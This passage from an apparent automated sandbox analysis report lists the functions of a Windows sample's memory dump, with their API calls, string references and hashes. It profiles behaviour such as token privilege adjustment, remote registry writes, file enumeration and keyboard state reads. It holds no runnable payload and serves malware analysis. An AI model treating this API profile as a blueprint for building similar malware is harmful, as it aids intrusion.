keybd_event.USER32(00000012,00000000), ref: 0077D71E
SetForegroundWindow.USER32(?), ref: 0077D721
AttachThreadInput.USER32(?,?,00000000), ref: 0077D748

Strings

Shell_TrayWnd, xrefs: 0077D660

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 7da9a4f328eddb7fb854ec51bfa0739ea110585effea8ae293314b8021b27269
Instruction ID: 8988478eab307c1f1766ce65f23faaa1692995c975c6923be20deb5129d72992
Opcode Fuzzy Hash: 7da9a4f328eddb7fb854ec51bfa0739ea110585effea8ae293314b8021b27269
Instruction Fuzzy Hash: 7C315271A40318BBEF206B619C49F7F7F7DEF44B90F108029FA05EA191C6B85D11ABA5

Function 00798310 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 007987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079882B
Part of subcall function 007987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00798858
Part of subcall function 007987E1: GetLastError.KERNEL32 ref: 00798865

_memset.LIBCMT ref: 00798353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007983A5
CloseHandle.KERNEL32(?), ref: 007983B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007983CD
GetProcessWindowStation.USER32 ref: 007983E6
SetProcessWindowStation.USER32(00000000), ref: 007983F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0079840A

Part of subcall function 007981CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00798309), ref: 007981E0
Part of subcall function 007981CB: CloseHandle.KERNEL32(?,?,00798309), ref: 007981F2

Strings

, xrefs: 00798362
winsta0, xrefs: 007983C8
default, xrefs: 00798405
winsta0\default, xrefs: 0079848B

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0$winsta0\default
API String ID: 2063423040-1685893292
Opcode ID: 15e08f8e945bb1b30f3011eb6e9cbfa233b0a61d29a6814ea4ece97a65430d62
Instruction ID: a4e8ad327057d18da2326e142ce61f31d79121226f37ac209a5f708e119a1041
Opcode Fuzzy Hash: 15e08f8e945bb1b30f3011eb6e9cbfa233b0a61d29a6814ea4ece97a65430d62
Instruction Fuzzy Hash: 33817B71900209AFDF519FA4EC49EFE7B79EF05304F248169F910A2261DB398E18DB21

Function 007AC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007AC78D
FindClose.KERNEL32(00000000), ref: 007AC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007AC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007AC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 007AC844
__swprintf.LIBCMT ref: 007AC890
__swprintf.LIBCMT ref: 007AC8D3

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

__swprintf.LIBCMT ref: 007AC927

Part of subcall function 00763698: __woutput_l.LIBCMT ref: 007636F1

__swprintf.LIBCMT ref: 007AC975

Part of subcall function 00763698: __flsbuf.LIBCMT ref: 00763713
Part of subcall function 00763698: __flsbuf.LIBCMT ref: 0076372B

__swprintf.LIBCMT ref: 007AC9C4
__swprintf.LIBCMT ref: 007ACA13
__swprintf.LIBCMT ref: 007ACA62

Strings

%4d, xrefs: 007AC8CD
%4d%02d%02d%02d%02d%02d, xrefs: 007AC88A
%02d, xrefs: 007AC91B, 007AC925, 007AC973, 007AC9C2, 007ACA11, 007ACA60

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: e27811032f875769ac45275537c5625fd1890ab33bd4152e26ea7101b04c55f6
Instruction ID: af3ea09ca14b8c9a23ddfbccab64bc52463be677a3b365396e8feecfce3ac369
Opcode Fuzzy Hash: e27811032f875769ac45275537c5625fd1890ab33bd4152e26ea7101b04c55f6
Instruction Fuzzy Hash: 17A11BB1508305EBC754EBA4C889DAFB7ECBF99700F404919F59586191EB38EA08CB62

Function 007AEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 007AEFB6
_wcscmp.LIBCMT ref: 007AEFCB
_wcscmp.LIBCMT ref: 007AEFE2
GetFileAttributesW.KERNEL32(?), ref: 007AEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 007AF00E
FindNextFileW.KERNEL32(00000000,?), ref: 007AF026
FindClose.KERNEL32(00000000), ref: 007AF031
FindFirstFileW.KERNEL32(*.*,?), ref: 007AF04D
_wcscmp.LIBCMT ref: 007AF074
_wcscmp.LIBCMT ref: 007AF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 007AF09D
SetCurrentDirectoryW.KERNEL32(007F8920), ref: 007AF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 007AF0C5
FindClose.KERNEL32(00000000), ref: 007AF0D2
FindClose.KERNEL32(00000000), ref: 007AF0E4

Strings

*.*, xrefs: 007AF048

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: abed6400015633bf1ad8435f63cbde481621630a7f067f66506df91409e69286
Instruction ID: 0445143b1f01c226b3efcefcdc6ce20c2d85be35557d9df2ff74ff2768e60d30
Opcode Fuzzy Hash: abed6400015633bf1ad8435f63cbde481621630a7f067f66506df91409e69286
Instruction Fuzzy Hash: 2E31B432501218AADB14DFB4DC48FEFB7ADAF85360F10427AE805D3192DB78DA44CA55

Function 007C0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C0953
RegCreateKeyExW.ADVAPI32(?,?,00000000,007CF910,00000000,?,00000000,?,?), ref: 007C09C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007C0A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007C0A92
RegCloseKey.ADVAPI32(?), ref: 007C0DB2
RegCloseKey.ADVAPI32(00000000), ref: 007C0DBF

Strings

REG_BINARY, xrefs: 007C0D4D
REG_QWORD, xrefs: 007C0D00
REG_MULTI_SZ, xrefs: 007C0B7A
REG_EXPAND_SZ, xrefs: 007C0A2F
REG_SZ, xrefs: 007C0AD0
REG_DWORD, xrefs: 007C0C83

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 7f91f73a5046b7d265052321ebe2b86eb09558dbf58aa87d57f421e06729b2fd
Instruction ID: 9330cf66c6708aacef7555998b770ff51033d3132a6e9a2b156b73367bbde98d
Opcode Fuzzy Hash: 7f91f73a5046b7d265052321ebe2b86eb09558dbf58aa87d57f421e06729b2fd
Instruction Fuzzy Hash: AF023875600601DFCB14EF18C859E2AB7E9EF89710F04855CF98A9B3A2DB39EC41CB81

Function 007CC5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

DragQueryPoint.SHELL32(?,?), ref: 007CC627

Part of subcall function 007CAB37: ClientToScreen.USER32(?,?), ref: 007CAB60
Part of subcall function 007CAB37: GetWindowRect.USER32(?,?), ref: 007CABD6
Part of subcall function 007CAB37: PtInRect.USER32(?,?,007CC014), ref: 007CABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 007CC690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007CC69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007CC6BE
_wcscat.LIBCMT ref: 007CC6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 007CC705
SendMessageW.USER32(?,000000B0,?,?), ref: 007CC71E
SendMessageW.USER32(?,000000B1,?,?), ref: 007CC735
SendMessageW.USER32(?,000000B1,?,?), ref: 007CC757
DragFinish.SHELL32(?), ref: 007CC75E
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 007CC851

Strings

@GUI_DRAGFILE, xrefs: 007CC800
@U=u, xrefs: 007CC690, 007CC705, 007CC71E, 007CC735, 007CC757
@GUI_DROPID, xrefs: 007CC77E
@GUI_DRAGID, xrefs: 007CC7C9

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
API String ID: 2166380349-762882726
Opcode ID: 595051c8bfc75515a9f0e2fcf9a09e22f15d9777010c6de82ec15f2a8a500c99
Instruction ID: 957751b580716868e89d20a14954d260c630bffcbe57fc9bc8c5f3c108bf345b
Opcode Fuzzy Hash: 595051c8bfc75515a9f0e2fcf9a09e22f15d9777010c6de82ec15f2a8a500c99
Instruction Fuzzy Hash: 11615D71108304EFC705DF64CC89EABBBE9EF89710F00492DF695962A1DB74AA49CB52

Function 007AF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 007AF113
_wcscmp.LIBCMT ref: 007AF128
_wcscmp.LIBCMT ref: 007AF13F

Part of subcall function 007A4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007A43A0

FindNextFileW.KERNEL32(00000000,?), ref: 007AF16E
FindClose.KERNEL32(00000000), ref: 007AF179
FindFirstFileW.KERNEL32(*.*,?), ref: 007AF195
_wcscmp.LIBCMT ref: 007AF1BC
_wcscmp.LIBCMT ref: 007AF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 007AF1E5
SetCurrentDirectoryW.KERNEL32(007F8920), ref: 007AF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 007AF20D
FindClose.KERNEL32(00000000), ref: 007AF21A
FindClose.KERNEL32(00000000), ref: 007AF22C

Strings

*.*, xrefs: 007AF190

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: a7a20ab93d91e103e2988867b896e68c7717303169ee1e3bbe64ce76897e9f1e
Instruction ID: 038d5464097deb3eae07431b051675ede7e428b23353c47c3142d22cb03a6200
Opcode Fuzzy Hash: a7a20ab93d91e103e2988867b896e68c7717303169ee1e3bbe64ce76897e9f1e
Instruction Fuzzy Hash: 6031A47650061DAADB109FB4EC49FEE77ADAF86360F104279E800A3191DB78DE45CA58

Function 007AA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007AA20F
__swprintf.LIBCMT ref: 007AA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 007AA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007AA293
_memset.LIBCMT ref: 007AA2B2
_wcsncpy.LIBCMT ref: 007AA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007AA323
CloseHandle.KERNEL32(00000000), ref: 007AA32E
RemoveDirectoryW.KERNEL32(?), ref: 007AA337
CloseHandle.KERNEL32(00000000), ref: 007AA341

Strings

\??\%s, xrefs: 007AA22B
\, xrefs: 007AA247
:, xrefs: 007AA252

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 7115c63c7586af2ad74c4f1bec6795523f3bc9a9bf5f92fbd1f32f69b42d0ab0
Instruction ID: ccc143c6a1ad088659ce5112a0b22299dd3af101796a96e525f73cfc5c68bee3
Opcode Fuzzy Hash: 7115c63c7586af2ad74c4f1bec6795523f3bc9a9bf5f92fbd1f32f69b42d0ab0
Instruction Fuzzy Hash: 563192B1900149BBDB219FA0DC49FEB37BDEF89741F1041BAFA09D2160EB789645CB25

Function 007CC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007CC1FC
GetFocus.USER32 ref: 007CC20C
GetDlgCtrlID.USER32(00000000), ref: 007CC217
_memset.LIBCMT ref: 007CC342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007CC36D
GetMenuItemCount.USER32(?), ref: 007CC38D
GetMenuItemID.USER32(?,00000000), ref: 007CC3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007CC3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007CC41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007CC454
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 007CC489

Strings

0, xrefs: 007CC33A

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
String ID: 0
API String ID: 3616455698-4108050209
Opcode ID: f09bdc9a4f2f3c49280752dc072ce91d9785a94ef3232c8d27c32b89a53aafd7
Instruction ID: 22d814e78e438c15b471cbffc18c117776af4ff576a550089659345954495697
Opcode Fuzzy Hash: f09bdc9a4f2f3c49280752dc072ce91d9785a94ef3232c8d27c32b89a53aafd7
Instruction Fuzzy Hash: 9E816C70208341AFD715CF14D894F6BBBE9FB88714F00892EFA9997291C738D905CBA2

Function 007566E1 Relevance: 20.9, Strings: 16, Instructions: 889COMMON

Download Yara Rule

Strings

NO_AUTO_POSSESS), xrefs: 0079112E
LF), xrefs: 007912A4
ANY), xrefs: 007912DE
UTF), xrefs: 007910FA
BSR_ANYCRLF), xrefs: 0079131E
3cu, xrefs: 007568FF
CRLF), xrefs: 007912C1
LIMIT_MATCH=, xrefs: 00791170
ANYCRLF), xrefs: 007912FB
UTF16), xrefs: 007910CF
NO_START_OPT), xrefs: 0079114F
BSR_UNICODE), xrefs: 00791338
_u, xrefs: 00791465, 0079150C, 007915B4
CR), xrefs: 00791287
UCP), xrefs: 0079110D
LIMIT_RECURSION=, xrefs: 007911FC

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID: 3cu$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_u
API String ID: 0-1430863840
Opcode ID: eb321b16ce458ae42988b0b9626bb8da7ba28c06eb4807911755cf5fe8054fb0
Instruction ID: c011b490db5c3843560bf8c6501637869328808a5330459f02a79e38597e11f2
Opcode Fuzzy Hash: eb321b16ce458ae42988b0b9626bb8da7ba28c06eb4807911755cf5fe8054fb0
Instruction Fuzzy Hash: E3726F75E0021ADBDF14CF58D8807EDB7B5FF48310F64816AE905EB290EB789995CB90

Function 007A001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 007A0097
SetKeyboardState.USER32(?), ref: 007A0102
GetAsyncKeyState.USER32(000000A0), ref: 007A0122
GetKeyState.USER32(000000A0), ref: 007A0139
GetAsyncKeyState.USER32(000000A1), ref: 007A0168
GetKeyState.USER32(000000A1), ref: 007A0179
GetAsyncKeyState.USER32(00000011), ref: 007A01A5
GetKeyState.USER32(00000011), ref: 007A01B3
GetAsyncKeyState.USER32(00000012), ref: 007A01DC
GetKeyState.USER32(00000012), ref: 007A01EA
GetAsyncKeyState.USER32(0000005B), ref: 007A0213
GetKeyState.USER32(0000005B), ref: 007A0221

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 784e260a1d44e8c9102fc163a9c6b2ac10ca26a155cb9fa299de9479b26d4988
Instruction ID: 66995d9bd5b31b51cb5d67d76ea3c544405d49a1746e5c260b257f7b81d071cf
Opcode Fuzzy Hash: 784e260a1d44e8c9102fc163a9c6b2ac10ca26a155cb9fa299de9479b26d4988
Instruction Fuzzy Hash: 1A51B92090478859FB35DBA089547EABFB49F43380F484B9DD5C1575C2DAAC9A8CC7E1

Function 007C03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BFDAD,?,?), ref: 007C0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C04AC

Part of subcall function 00749837: __itow.LIBCMT ref: 00749862
Part of subcall function 00749837: __swprintf.LIBCMT ref: 007498AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007C054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007C05E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007C0822
RegCloseKey.ADVAPI32(00000000), ref: 007C082F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: bcca9a0f7ee3660b08793a324cec4b692a8ab1e718ec407be8b304ed022226d5
Instruction ID: 012846c8803c5729f2bbd7e4bbbee6f8bc518638d6ace142cba9a3bd7a28b7c7
Opcode Fuzzy Hash: bcca9a0f7ee3660b08793a324cec4b692a8ab1e718ec407be8b304ed022226d5
Instruction Fuzzy Hash: 3FE14C71204200EFCB14DF28C895E6BBBE9EF89714B04C96DF94ADB261DB35E905CB91

Function 007CD43E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

GetSystemMetrics.USER32(0000000F), ref: 007CD47C
